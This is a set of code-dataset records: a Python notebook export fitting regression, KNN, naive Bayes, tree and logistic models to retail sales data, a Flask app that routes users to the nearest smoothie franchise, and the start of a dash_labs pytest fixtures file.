'population'])\npcsComponents_df\n\n\n# In[21]:\n\n\n#Use the transform method to get the scores.\n\nscores = pd.DataFrame(pcs.transform(retail[['percapitaincome', 'population']]), \n columns=['PC1', 'PC2'])\nscores.head()\n\n\n#Perform a principal component analysis of the whole table ignoring the first non-numerical column.\n\npcs = PCA()\npcs.fit(retail.iloc[:, 2:6].dropna(axis=0))\npcsSummary_df = pd.DataFrame({'Standard deviation': np.sqrt(pcs.explained_variance_),\n 'Proportion of variance': pcs.explained_variance_ratio_,\n 'Cumulative proportion': np.cumsum(pcs.explained_variance_ratio_)})\npcsSummary_df = pcsSummary_df.transpose()\npcsSummary_df.columns = ['PC{}'.format(i) for i in range(1, len(pcsSummary_df.columns) + 1)]\npcsSummary_df.round(4)\n\n\npcsComponents_df = pd.DataFrame(pcs.components_.transpose(), columns=pcsSummary_df.columns, \n index=retail.iloc[:, 2:6].columns)\npcsComponents_df.iloc[:,:6]\n\n\n# In[23]:\n\n\n#Multiple linear Regression\n\nretail = pd.read_csv('retailsales.csv')\n\npredictors = ['percapitaincome', 'population', 'unemployment', 'inventory', 'yoygtenp', 'inventorygrowthabovefive', 'percapitagrowthabove']\noutcome = 'retailsales'\n\nX = pd.get_dummies(retail[predictors], drop_first=True)\nY = retail[outcome]\n\ntrain_X, valid_X, train_Y, valid_Y = train_test_split(X, Y, test_size=0.4, random_state=1)\n\n# train linear regression model\nreg = LinearRegression()\nreg.fit(train_X, train_Y)\n\n\n# In[24]:\n\n\n# print coefficients\nprint('intercept ', reg.intercept_)\nprint(pd.DataFrame({'Predictor': X.columns, 'coefficient': reg.coef_}))\n\n\n# In[25]:\n\n\n# evaluate performance\n# training\nregressionSummary(train_Y, reg.predict(train_X))\n# validation\nregressionSummary(valid_Y, reg.predict(valid_X))\n\n\n# In[26]:\n\n\npred_error_train = pd.DataFrame({\n 'residual': train_Y - reg.predict(train_X), \n 'data set': 'training'\n})\npred_error_valid = pd.DataFrame({\n 'residual': valid_Y - reg.predict(valid_X), \n 'data set': 'validation'\n})\nboxdata_df = pred_error_train.append(pred_error_valid, ignore_index=True)\n\nfig, axes = plt.subplots(nrows=1, ncols=3)\nfig.set_size_inches(9, 4)\ncommon = {'bins': 100, 'range': [-30000, 30000]}\npred_error_train.hist(ax=axes[0], **common)\npred_error_valid.hist(ax=axes[1], **common)\nboxdata_df.boxplot(ax=axes[2], by='data set')\n\naxes[0].set_title('training')\naxes[1].set_title('validation')\naxes[2].set_title(' ')\naxes[2].set_ylim(-30000, 30000)\nplt.suptitle('Prediction errors') \nplt.subplots_adjust(bottom=0.15, top=0.85, wspace=0.35)\n\nplt.show()\n\n\n# 
In[27]:\n\n\n#Adjusted R2 BIC and AIC\n\npred_Y = reg.predict(train_X)\n\nprint('adjusted r2 : ', adjusted_r2_score(train_Y, pred_Y, reg))\nprint('AIC : ', AIC_score(train_Y, pred_Y, reg))\nprint('BIC : ', BIC_score(train_Y, pred_Y, reg))\n\n\n\n\n# Use predict() to make predictions on a new set\nreg_lm_pred = reg.predict(valid_X)\n\nresult = pd.DataFrame({'Predicted': reg_lm_pred, 'Actual': valid_Y,\n 'Residual': valid_Y - reg_lm_pred})\nprint(result.head(20))\n\n# Compute common accuracy measures\nregressionSummary(valid_Y, reg_lm_pred)\n\n\n#determine residuals and create histogram\n\nreg_lm_pred = reg.predict(valid_X)\nall_residuals = valid_Y - reg_lm_pred\n\n# Determine the percentage of datapoints with a residual in [-24000, 24000] = approx. 75\\%\nprint(len(all_residuals[(all_residuals > -24000) & (all_residuals < 24000)]) / len(all_residuals))\n\nax = pd.DataFrame({'Residuals': all_residuals}).hist(bins=25)\n\nplt.tight_layout()\nplt.show()\n\n\n# In[28]:\n\n\n#Exhaustive search for reducing predictors - ranks variables and need and gives scores\n\ndef train_model(variables):\n model = LinearRegression()\n model.fit(train_X[variables], train_Y)\n return model\n\ndef score_model(model, variables):\n pred_Y = model.predict(train_X[variables])\n # we negate as score is optimized to be as low as possible\n return -adjusted_r2_score(train_Y, pred_Y, model)\n\nallVariables = train_X.columns\nresults = exhaustive_search(allVariables, train_model, score_model)\n\ndata = []\nfor result in results:\n model = result['model']\n variables = result['variables']\n AIC = AIC_score(train_Y, model.predict(train_X[variables]), model)\n \n d = {'n': result['n'], 'r2adj': -result['score'], 'AIC': AIC}\n d.update({var: var in result['variables'] for var in allVariables})\n data.append(d)\npd.set_option('display.width', 100)\nprint(pd.DataFrame(data, columns=('n', 'r2adj', 'AIC') + tuple(sorted(allVariables))))\npd.reset_option('display.width')\n\n\n# In[29]:\n\n\n#backward elimination\n\ndef train_model(variables):\n model = LinearRegression()\n model.fit(train_X[variables], train_Y)\n return model\n\ndef score_model(model, variables):\n return AIC_score(train_Y, model.predict(train_X[variables]), model)\n\nbest_model, best_variables = backward_elimination(train_X.columns, train_model, score_model, verbose=True)\n\nprint(best_variables)\n\nregressionSummary(valid_Y, best_model.predict(valid_X[best_variables]))\n\n\n# In[30]:\n\n\n# Forward selection\n\n# The initial model is the constant model - this requires special handling\n# in train_model and score_model\ndef train_model(variables):\n if len(variables) == 0:\n return None\n model = LinearRegression()\n model.fit(train_X[variables], train_Y)\n return model\n\ndef score_model(model, variables):\n if len(variables) == 0:\n return AIC_score(train_Y, [train_Y.mean()] * len(train_Y), model, df=1)\n return AIC_score(train_Y, model.predict(train_X[variables]), model)\n\nbest_model, best_variables = forward_selection(train_X.columns, train_model, score_model, verbose=True)\n\nprint(best_variables)\n\n\n# In[31]:\n\n\n#stepwise_selection\n\nbest_model, best_variables = stepwise_selection(train_X.columns, train_model, score_model, verbose=True)\n\nprint(best_variables)\n\n\n# In[37]:\n\n\n# Regularization (Shrinkage Models)\n\nlasso = Lasso(normalize=True, alpha=1)\nlasso.fit(train_X, train_Y)\nregressionSummary(valid_Y, lasso.predict(valid_X))\n\nlasso_cv = LassoCV(normalize=True, cv=5)\n\nlasso_cv.fit(train_X, train_Y)\nregressionSummary(valid_Y, 
lasso_cv.predict(valid_X))\nprint('Lasso-CV chosen regularization: ', lasso_cv.alpha_)\nprint(lasso_cv.coef_)\n\nridge = Ridge(normalize=True, alpha=1)\nridge.fit(train_X, train_Y)\nregressionSummary(valid_Y, ridge.predict(valid_X))\n\nbayesianRidge = BayesianRidge(normalize=True)\nbayesianRidge.fit(train_X, train_Y)\nregressionSummary(valid_Y, bayesianRidge.predict(valid_X))\nprint('Bayesian ridge chosen regularization: ', bayesianRidge.lambda_ / bayesianRidge.alpha_)\n\n\n# In[42]:\n\n\nreg = LinearRegression()\nreg.fit(train_X, train_Y)\n\npd.DataFrame({'features': train_X.columns, 'coefficient': reg.coef_, \n 'lasso': lasso.coef_, 'lassoCV': lasso_cv.coef_, 'bayesianRidge': bayesianRidge.coef_})\n\n\n# run a linear regression of sales on the remaining predictors in the training set\ntrain_df = train_X.join(train_Y)\n\npredictors = train_X.columns\nformula = 'retailsales ~ ' + ' + '.join(predictors)\n\nreg = sm.ols(formula=formula, data=train_df).fit()\nprint(reg.summary())\n\n\n# In[43]:\n\n\n#KNN\n\nretail = pd.read_csv('retailsales1.csv')\n\nretail['Number'] = retail.index + 1\nretail\n\n#train and valid KNN\n\ntrainData, validData = train_test_split(retail, test_size=0.4, random_state=26)\nprint(trainData.shape, validData.shape)\nnewretail = pd.DataFrame([{'inventorygrowth': 5, 'populationgrowth': 1.1}])\nnewretail\n\n#scatterplot\nfig, ax = plt.subplots()\n\nsubset = trainData.loc[trainData['yoygtenp']=='NO']\nax.scatter(subset.inventorygrowth, subset.populationgrowth, marker='o', label='NOGROWTH', color='C1')\n\nsubset = trainData.loc[trainData['yoygtenp']=='YES']\nax.scatter(subset. inventorygrowth, subset. populationgrowth, marker='D', label='GROWTH', color='C0')\n\nax.scatter(newretail.inventorygrowth, newretail.populationgrowth, marker='*', label='Newretail', color='black', s=150)\n\nplt.xlabel('inventorygrowth') # set x-axis label\nplt.ylabel('populationgrowth') # set y-axis label\nfor _, row in trainData.iterrows():\n ax.annotate(row.Number, (row.inventorygrowth + 2, row. populationgrowth))\n \nhandles, labels = ax.get_legend_handles_labels()\nax.set_xlim(0, 15)\nax.set_ylim(0, 2)\nax.legend(handles, labels, loc=4)\n\nplt.show()\n\n\n\ndef plotDataset(ax, data, showLabel=True, **kwargs):\n subset = data.loc[data['yoygtenp']=='NO']\n ax.scatter(subset.inventorygrowth, subset.populationgrowth, marker='o', label='NO' if showLabel else None, color='C1', **kwargs)\n\n subset = data.loc[data['yoygtenp']=='YES']\n ax.scatter(subset.inventorygrowth, subset.populationgrowth, marker='D', label='YES' if showLabel else None, color='C0', **kwargs)\n\n plt.xlabel('inventorygrowth') # set x-axis label\n plt.ylabel('populationgrowth') # set y-axis label\n for _, row in data.iterrows():\n ax.annotate(row.Number, (row.inventorygrowth + 2, row.populationgrowth))\n\nfig, ax = plt.subplots()\n\nplotDataset(ax, trainData)\nplotDataset(ax, validData, showLabel=False, facecolors='none')\n\nax.scatter(newretail.inventorygrowth, newretail.populationgrowth, marker='*', label='Newretail ', color='black', s=150)\n\nplt.xlabel('inventorygrowth') # set x-axis label\nplt.ylabel('populationgrowth') # set y-axis label\n \nhandles, labels = ax.get_legend_handles_labels()\nax.set_xlim(1, 15)\nax.legend(handles, labels, loc=4)\n\nplt.show()\n\n\n\n#Initialize normalized training, validation, and complete data frames. 
Use the training data to learn the transformation.\n\n\nscaler = preprocessing.StandardScaler()\nscaler.fit(trainData[['inventorygrowth', 'populationgrowth']]) # Note the use of an array of column names\n\n# Transform the full dataset\nretailNorm = pd.concat([pd.DataFrame(scaler.transform(retail[['inventorygrowth', 'populationgrowth']]), \n columns=['zinventorygrowth', 'zpopulationgrowth']),\n retail[['yoygtenp', 'Number']]], axis=1)\ntrainNorm = retailNorm.iloc[trainData.index]\nvalidNorm = retailNorm.iloc[validData.index]\nnewretailNorm = pd.DataFrame(scaler.transform(newretail), columns=['zinventorygrowth', 'zpopulationgrowth'])\n\n\n# In[44]:\n\n\n\n#Use k-nearest neighbour\n\nknn = NearestNeighbors(n_neighbors=3)\nknn.fit(trainNorm[['zinventorygrowth', 'zpopulationgrowth']])\ndistances, indices = knn.kneighbors(newretailNorm)\nprint(trainNorm.iloc[indices[0], :]) # indices is a list of lists, we are only interested in the first element\n\n\n# In[45]:\n\n\n#accuracy\n\ntrain_X = trainNorm[['zinventorygrowth', 'zpopulationgrowth']]\ntrain_y = trainNorm['yoygtenp']\nvalid_X = validNorm[['zinventorygrowth', 'zpopulationgrowth']]\nvalid_y = validNorm['yoygtenp']\n\n# Train a classifier for different values of k\nresults = []\nfor k in range(1, 12):\n knn = KNeighborsClassifier(n_neighbors=k).fit(train_X, train_y)\n results.append({\n 'k': k,\n 'accuracy': accuracy_score(valid_y, knn.predict(valid_X))\n })\n\n# Convert results to a pandas data frame\nresults = pd.DataFrame(results)\nprint(results)\n\n\n# Retrain with full dataset---KNN\nretail_X = retailNorm[['zinventorygrowth', 'zpopulationgrowth']]\nretail_y = retailNorm['yoygtenp']\nknn = KNeighborsClassifier(n_neighbors=4).fit(retail_X, retail_y)\ndistances, indices = knn.kneighbors(newretailNorm)\nprint(knn.predict(newretailNorm))\nprint('Distances',distances)\nprint('Indices', indices)\nprint(retailNorm.iloc[indices[0], :])\n\n\n# In[46]:\n\n\n#NAIVE BAYES\n\nretail = pd.read_csv('retailsales2.csv')\nretail.head()\n\n# convert to categorical\nretail.inventorygrowthabovefive = retail.inventorygrowthabovefive.astype('category')\nretail.populationgrowthabove = retail.populationgrowthabove.astype('category')\n\n\npredictors = ['inventorygrowthabovefive', 'populationgrowthabove']\noutcome = 'yoygtenp'\n\nX = pd.get_dummies(retail[predictors])\ny = (retail[outcome] == 'NO').astype(int)\nclasses = ['YES', 'NO']\n\n# split into training and validation\nX_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.40, random_state=1)\n\n# run naive Bayes\nretail_nb = MultinomialNB(alpha=0.01)\nretail_nb.fit(X_train, y_train)\n\n# predict probabilities\npredProb_train = retail_nb.predict_proba(X_train)\npredProb_valid = retail_nb.predict_proba(X_valid)\n\n# predict class membership\ny_valid_pred = retail_nb.predict(X_valid)\ny_train_pred = retail_nb.predict(X_train)\n\n\nretail.inventorygrowthabovefive = retail.inventorygrowthabovefive.astype('category')\nretail.populationgrowthabove = retail.populationgrowthabove.astype('category')\n\nretail['yoygtenp'] = retail['yoygtenp'].astype('category')\n\n\npredictors = ['inventorygrowthabovefive', 'populationgrowthabove']\noutcome = 'yoygtenp'\n\nX = pd.get_dummies(retail[predictors])\ny = retail['yoygtenp']\nclasses = list(y.cat.categories)\n\n# split into training and validation\nX_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.40, random_state=1)\n\n# run naive Bayes\nretail_nb = MultinomialNB(alpha=0.01)\nretail_nb.fit(X_train, y_train)\n\n# predict 
probabilities\npredProb_train = retail_nb.predict_proba(X_train)\npredProb_valid = retail_nb.predict_proba(X_valid)\n\n# predict class membership\ny_valid_pred = retail_nb.predict(X_valid)\ny_train_pred = retail_nb.predict(X_train)\n\n\n#First construct a frequency table and then convert it to the propability table\n\n\n# split the original data frame into a train and test using the same random_state\ntrain_df, valid_df = train_test_split(retail, test_size=0.4, random_state=1)\n\npd.set_option('precision', 4)\n# probability of flight status\nprint(train_df['yoygtenp'].value_counts() / len(train_df))\nprint()\n\nfor predictor in predictors:\n # construct the frequency table\n df = train_df[['yoygtenp', predictor]]\n freqTable = df.pivot_table(index='yoygtenp', columns=predictor, aggfunc=len)\n\n # divide each row by the sum of the row to get conditional probabilities\n propTable = freqTable.apply(lambda x: x / sum(x), axis=1)\n print(propTable)\n print()\npd.reset_option('precision')\n\n\n\n# Subset a specific set/ predicting for new data\ndf = pd.concat([pd.DataFrame({'actual': y_valid, 'predicted': y_valid_pred}),\n pd.DataFrame(predProb_valid, index=y_valid.index)], axis=1)\nmask = ((X_valid.inventorygrowthabovefive_YES == 1) & (X_valid. populationgrowthabove_YES == 1))\n\nprint(df[mask])\n\n\n\n#Confusionmatrix\nclassificationSummary(y_train, y_train_pred, class_names=classes) \n\nprint()\n\nclassificationSummary(y_valid, y_valid_pred, class_names=classes)\n\n\n# In[47]:\n\n\n#Regressiontree\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nfrom pathlib import Path\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import train_test_split, cross_val_score, GridSearchCV\nimport matplotlib.pylab as plt\nfrom dmba import plotDecisionTree, classificationSummary, regressionSummary\n\n\nretail = pd.read_csv('retailsales.csv')\n\npredictors = ['percapitaincome', 'population', 'unemployment', 'inventory', 'yoygtenp', 'inventorygrowthabovefive', 'percapitagrowthabove']\noutcome = 'retailsales'\n\nX = pd.get_dummies(retail[predictors], drop_first=True)\ny = retail[outcome]\n\ntrain_X, valid_X, train_y, valid_y = train_test_split(X, y, test_size=0.4, random_state=1)\n\n# user grid search to find optimized tree\nparam_grid = {\n 'max_depth': [5, 10, 15, 20, 25], \n 'min_impurity_decrease': [0, 0.001, 0.005, 0.01], \n 'min_samples_split': [10, 20, 30, 40, 50], \n}\ngridSearch = GridSearchCV(DecisionTreeRegressor(), param_grid, cv=5, n_jobs=-1)\ngridSearch.fit(train_X, train_y)\nprint('Initial parameters: ', gridSearch.best_params_)\n\nparam_grid = {\n 'max_depth': [3, 4, 5, 6, 7, 8, 9, 10, 11, 12], \n 'min_impurity_decrease': [0, 0.001, 0.002, 0.003, 0.005, 0.006, 0.007, 0.008], \n 'min_samples_split': [14, 15, 16, 18, 20, ], \n}\ngridSearch = GridSearchCV(DecisionTreeRegressor(), param_grid, cv=5, n_jobs=-1)\ngridSearch.fit(train_X, train_y)\nprint('Improved parameters: ', gridSearch.best_params_)\n\nregTree = gridSearch.best_estimator_\n\n\nregressionSummary(train_y, regTree.predict(train_X))\nregressionSummary(valid_y, regTree.predict(valid_X))\n\n#plot reg tree\n\nplotDecisionTree(regTree, feature_names=train_X.columns)\nplotDecisionTree(regTree, feature_names=train_X.columns, rotate=True)\n\n\n# In[48]:\n\n\n#Classification Tree\nretail = pd.read_csv('retailsales1.csv')\n\npredictors = ['inventorygrowth', 
'populationgrowth']\noutcome = 'yoygtenp'\n\nX = pd.get_dummies(retail[predictors], drop_first=True)\ny = retail[outcome]\n\ntrain_X, valid_X, train_y, valid_y = train_test_split(X, y, test_size=0.4, random_state=1)\n\nfullClassTree = DecisionTreeClassifier()\nfullClassTree.fit(train_X, train_y)\n\nplotDecisionTree(fullClassTree, feature_names=train_X.columns)#Confusion matrix on classification tree\n\nclassificationSummary(train_y, fullClassTree.predict(train_X))\nclassificationSummary(valid_y, fullClassTree.predict(valid_X))\n\n\n# Five-fold cross-validation of the full decision tree classifier\ntreeClassifier = DecisionTreeClassifier()\n\nscores = cross_val_score(treeClassifier, train_X, train_y, cv=5)\nprint('Accuracy scores of each fold: ', [f'{acc:.3f}' for acc in scores])\nprint(f'Accuracy: {scores.mean():.3f} (+/- {scores.std() * 2:.3f})')\nprint(f'Accuracy: {scores.mean():.3f} (+/- {scores.std():.3f})')\n\n\n# In[49]:\n\n\n#ensembles.\n\n#code for bagging and boosting trees\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nfrom pathlib import Path\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom dmba import classificationSummary\n\n\nretail = pd.read_csv('retailsales2.csv')\n\n\npredictors = ['inventorygrowthabovefive', 'populationgrowthabove']\noutcome = 'yoygtenp'\n\n\n# split into training and validation\n\nX = pd.get_dummies(retail[predictors], drop_first=True)\ny = retail[outcome]\n\n\nX_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.40, random_state=3)\n\n#singletree\n\ndefaultTree = DecisionTreeClassifier(random_state=1)\ndefaultTree.fit(X_train, y_train)\n\nclasses = defaultTree.classes_\nclassificationSummary(y_valid, defaultTree.predict(X_valid), class_names=defaultTree.classes_)\n\n\n#bagging\nbagging = BaggingClassifier(DecisionTreeClassifier(random_state=1), \n n_estimators=100, random_state=1)\nbagging.fit(X_train, y_train)\n\nclassificationSummary(y_valid, bagging.predict(X_valid), class_names=classes)\n\n\n#boosting\nboost = AdaBoostClassifier(DecisionTreeClassifier(random_state=1), n_estimators=100, random_state=1)\nboost.fit(X_train, y_train)\n\nclassificationSummary(y_valid, boost.predict(X_valid), class_names=classes)\n\n\n# In[51]:\n\n\n#Logistics regression\n\nfrom sklearn.linear_model import LogisticRegression, LogisticRegressionCV\nfrom sklearn.model_selection import train_test_split\nimport statsmodels.api as sm\nfrom mord import LogisticIT\nimport matplotlib.pylab as plt\nimport seaborn as sns\nfrom dmba import classificationSummary, gainsChart, liftChart\nfrom dmba.metric import AIC_score\n\n#code for fitting a logistic regression model\n\nretail = pd.read_csv('retailsales.csv')\nretail.head()\n\n# convert to categorical\nretail.inventorygrowthabovefive = retail.inventorygrowthabovefive.astype('category')\nretail.percapitagrowthabove = retail.percapitagrowthabove.astype('category')\n\n\npredictors = ['inventorygrowthabovefive', 'percapitagrowthabove']\noutcome = 'yoygtenp'\n\nX = pd.get_dummies(retail[predictors])\ny = (retail[outcome] == 'NO').astype(int)\nclasses = ['YES', 'NO']\n\n# partition data\ntrain_X, valid_X, train_y, valid_y = train_test_split(X, y, test_size=0.4, random_state=1)\n\n# fit a logistic regression (set penalty=l2 and C=1e42 to avoid regularization)\nlogit_reg = 
LogisticRegression(penalty=\"l2\", C=1e42, solver='liblinear')\nlogit_reg.fit(train_X, train_y)\n\nprint('intercept ', logit_reg.intercept_[0])\nprint(pd.DataFrame({'coeff': logit_reg.coef_[0]}, index=X.columns).transpose())\nprint()\nprint('AIC', AIC_score(valid_y, logit_reg.predict(valid_X), df = len(train_X.columns) + 1))\n\n\n#code for using logistic regression to generate predicted probabilities\n\nlogit_reg_pred = logit_reg.predict(valid_X)\nlogit_reg_proba = logit_reg.predict_proba(valid_X)\nlogit_result = pd.DataFrame({'actual': valid_y, \n 'p(0)': [p[0] for p in logit_reg_proba],\n 'p(1)': [p[1] for p in logit_reg_proba],\n 'predicted': logit_reg_pred })\n\n# display four different cases\ninterestingCases = [27, 93, 21, 70]\nprint(logit_result.loc[interestingCases])\n\n\n#confusion matrix\nclassificationSummary(train_y, logit_reg.predict(train_X))\nclassificationSummary(valid_y, logit_reg.predict(valid_X))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"arunfinacle/machine-learning-models","sub_path":"machinelearningallmodels.py","file_name":"machinelearningallmodels.py","file_ext":"py","file_size_in_byte":26435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1693548782","text":"from flask import Flask, render_template, request, jsonify\nfrom flask_assets import Bundle, Environment\nfrom smoothi_finder_fcns import*\nimport folium\nimport geocoder\nimport urllib.request\nimport json\n\napp = Flask(__name__)\n\n# Initialize Flask-Assets\nassets = Environment(app)\n\n# Define asset bundles\njs_bundle = Bundle(\n 'https://unpkg.com/leaflet@1.7.1/dist/leaflet.js',\n 'https://unpkg.com/leaflet.locatecontrol/dist/L.Control.Locate.min.js',\n 'https://cdnjs.cloudflare.com/ajax/libs/leaflet.markercluster/1.5.1/leaflet.markercluster.js'\n)\ncss_bundle = Bundle(\n 'https://unpkg.com/leaflet@1.7.1/dist/leaflet.css',\n 'https://unpkg.com/leaflet.locatecontrol/dist/L.Control.Locate.min.css',\n 'https://cdnjs.cloudflare.com/ajax/libs/leaflet.markercluster/1.5.1/MarkerCluster.css',\n 'https://cdnjs.cloudflare.com/ajax/libs/leaflet.markercluster/1.5.1/MarkerCluster.Default.css'\n)\n\n# Register asset bundles\nassets.register('js_all', js_bundle)\nassets.register('css_all', css_bundle)\n\napp.static_folder = 'static'\n\n# Read locations from files\ntropical_smoothie_locations = read_locations('TropicalLocations.txt')\ntropical_smoothie_locations_loc = [item + [\"Tropical Smoothie\"] for item in tropical_smoothie_locations]\njamba_locations = read_locations('Jamba_Locations.txt')\njamba_locations_loc = [item + [\"Jamba Juice\"] for item in jamba_locations]\nsmoothie_king_locations = read_locations('Smoothie_King_Locations.txt')\nsmoothie_king_locations_loc = [item + [\"Smoothie King\"] for item in smoothie_king_locations]\n\nall_locations = tropical_smoothie_locations_loc + jamba_locations_loc + smoothie_king_locations_loc\n\n# Count the number of locations\nnumber_of = len(tropical_smoothie_locations)\nnumber_of_jamba = len(jamba_locations)\nnumber_of_smoothie_king = len(smoothie_king_locations)\n\n# Extract smoothie locations\nsmoothie_locations = [coordinate[-2:] for coordinate in tropical_smoothie_locations]\nsmoothie_locations_jamba = [coordinate[-2:] for coordinate in jamba_locations]\nsmoothie_locations_smoothie_king = [coordinate[-2:] for coordinate in smoothie_king_locations]\n\napi_keys = load_api_keys('api.txt')\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html', input_coordinates = 
smoothie_locations, input_coordinates_jamba = smoothie_locations_jamba, input_coordinates_smoothie_king = smoothie_locations_smoothie_king, total_location = number_of, total_location_jamba = number_of_jamba, total_location_smoothie_king = number_of_smoothie_king)\n\n@app.route('/route_to', methods=['POST'])\ndef route_to():\n # Use Bing Maps to find a route\n bingMapsKey = api_keys[0]\n\n franchise = request.form['franchise']\n user_input= request.form['user_input']\n\n if franchise == 'Jamba Juice':\n route_settings = jamba_locations_loc\n elif franchise == 'Tropical Smoothie':\n route_settings = tropical_smoothie_locations_loc\n elif franchise == 'Smoothie King':\n route_settings = smoothie_king_locations_loc\n else:\n route_settings = all_locations\n \n lat = request.form['lat']\n lon = request.form['lon']\n \n #if there is no input default to [0,0]\n if lat == '' or lon =='':\n lat = 0\n lon = 0\n if user_input != '':\n lat,lon = get_coordinates(bingMapsKey, user_input)\n\n closest_location, distance = find_closest_location(['', '', '', lat, lon], route_settings)\n state_abbreviation, town_name, address, target_lat, target_lon, franchise_name = closest_location\n\n # Create a Folium map centered between the user's location and the closest location\n center_lat = (float(lat) + float(target_lat)) / 2\n center_lon = (float(lon) + float(target_lon)) / 2\n m = folium.Map(location=[center_lat, center_lon])\n\n routeUrl = f\"http://dev.virtualearth.net/REST/V1/Routes/Driving?wp.0={lat},{lon}&wp.1={target_lat},{target_lon}&routePathOutput=Points&key={bingMapsKey}\"\n try:\n response = urllib.request.urlopen(routeUrl)\n result = json.loads(response.read().decode(encoding=\"utf-8\"))\n\n resources = result[\"resourceSets\"][0][\"resources\"][0]\n itineraryItems = resources[\"routeLegs\"][0][\"itineraryItems\"]\n plotPoints = resources.get('routePath', {}).get('line', {}).get('coordinates')\n tripDistance = round(resources[\"travelDistance\"],2)\n traffic = resources[\"trafficCongestion\"]\n tripTime = resources[\"travelDuration\"]\n bbox = resources[\"bbox\"]\n # Convert trip time to hours and minutes\n trip_hours, remainder = divmod(tripTime, 3600)\n trip_minutes, _ = divmod(remainder, 60)\n\n #account for hour or hours\n if trip_hours == 1:\n Travel_Time = f\"{trip_hours} hour and {trip_minutes} minutes\"\n elif trip_hours == 0:\n Travel_Time = f\"{trip_minutes} minutes\"\n else:\n Travel_Time = f\"{trip_hours} hours and {trip_minutes} minutes\"\n \n # Append the directions to the list\n directions = [item[\"instruction\"][\"text\"] for item in itineraryItems]\n\n # Set the plot points\n coordinates = [(point[0], point[1]) for point in plotPoints] if plotPoints else []\n\n # Create a line connecting the points\n\n folium.PolyLine(locations=coordinates, color='green').add_to(m)\n except:\n tripDistance = \"No land route found\"\n traffic = \"N/A\"\n Travel_Time = \"N/A\"\n\n # Add the user's location marker\n folium.Marker(location=[float(lat), float(lon)], popup='User Location', icon=folium.Icon(color='blue')).add_to(m)\n\n # Add the closest location marker\n folium.Marker(location=[float(target_lat), float(target_lon)], popup=f'{town_name}, {state_abbreviation}, {address}', icon=folium.Icon(color='red')).add_to(m)\n\n # Add a line between the user's location and the closest location\n folium.PolyLine(locations=[[float(lat), float(lon)], [float(target_lat), float(target_lon)]], color='red').add_to(m)\n\n # Fit the bounds of the map to show both locations\n bounds = [[float(lat), float(lon)], 
[float(target_lat), float(target_lon)]]\n m.fit_bounds(bounds)\n\n # Add map key with distance and phrase\n map_key_html = \"\"\"\n
    \n    Distance to {}    \n    Distance as the crow flies: {} km    \n Driving Route Information:    \n Distance: {} km    \n Traffic Level: {}    \n Travel Time: {}    \n \n
    \n \"\"\".format(franchise_name,round(distance,2),tripDistance, traffic, Travel_Time)\n m.get_root().html.add_child(folium.Element(map_key_html))\n\n # Save the map as HTML\n route_map = m._repr_html_()\n return render_template('map.html', map_html=route_map, franchise=franchise)\n\n@app.route('/current_location')\ndef get_current_location():\n ip_addr = request.environ.get('HTTP_X_FORWARDED_FOR', request.remote_addr)\n g = geocoder.ip(ip_addr)\n if g.latlng:\n return jsonify({'lat': g.latlng[0], 'lon': g.latlng[1]})\n else:\n return jsonify({'error': 'Unable to retrieve current location'})\n\n\nif __name__ == '__main__':\n app.run(debug=False)","repo_name":"hbzxc/Smoothie_finder","sub_path":"flask_app/smoothie_finder.py","file_name":"smoothie_finder.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43284088098","text":"import string\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\n\nimport pytest\nfrom dash.dependencies import Input, Output, State\nfrom dash_labs.grouping import make_grouping_by_index\nfrom dash_labs.plugins import FlexibleCallbacks\n\n# Helpers\nfrom dash_labs.templates.base import BaseTemplate\nfrom dash_labs.util import add_css_class, build_id\n\n\ndef all_component_props(component):\n return [prop for prop in component._prop_names if prop.isidentifier()]\n\n\ndef build_component_with_grouping(component_cls, int_grouping, size):\n component = component_cls()\n props = all_component_props(component)[5 : 5 + size]\n # set component property values\n for i, prop in enumerate(props):\n setattr(component, prop, i)\n # Build prop grouping\n prop_grouping = make_grouping_by_index(int_grouping, props)\n return component, prop_grouping, int_grouping\n\n\n@pytest.fixture\ndef scalar_grouping_size(request):\n return 0, 1\n\n\n@pytest.fixture(params=list(range(0, 5)))\ndef tuple_grouping_size(request):\n n = request.param\n return tuple(range(n)), n\n\n\n@pytest.fixture(params=list(range(0, 5)))\ndef dict_grouping_size(request):\n n = request.param\n return {string.ascii_uppercase[i]: i for i in range(n)}, n\n\n\n@pytest.fixture(params=list(range(0, 5)))\ndef mixed_grouping_size(request):\n case = request.param\n if case == 0:\n # tuple of tuples\n grouping = ((0, 1), 2)\n grouping_size = 3\n elif case == 1:\n # Deeply nested tuple of tuples\n grouping = (0, (1, (2, 3), ()), (), (4, ((5, (6, (7, 8))), 9)))\n grouping_size = 10\n elif case == 2:\n # dict of tuples\n grouping = {\"A\": (0, 1), \"B\": 2}\n grouping_size = 3\n elif case == 3:\n # dict of dicts\n grouping = dict(\n k0=0,\n k6=dict(k1=1, k2=dict(k3=2, k4=3), k5=()),\n k7=(),\n k13=dict(k8=4, k9=dict(k10=dict(k11=5), k12=6)),\n )\n grouping_size = 7\n else:\n # tuple of mixed\n grouping = (\n dict(\n k0=0,\n k6=dict(k1=1, k2=dict(k3=2, k4=3), k5=()),\n k7=(),\n k13=dict(k8=4, k9=(5, 6), k12=()),\n ),\n 7,\n ((8, dict(k13=(9, 10, 11), k14=dict(k15=12))), ()),\n )\n grouping_size = 13\n\n return grouping, grouping_size\n\n\n@pytest.fixture(params=[html.Button, dcc.Input])\ndef component_cls(request):\n return request.param\n\n\n@pytest.fixture\ndef component_str_prop(component_cls, 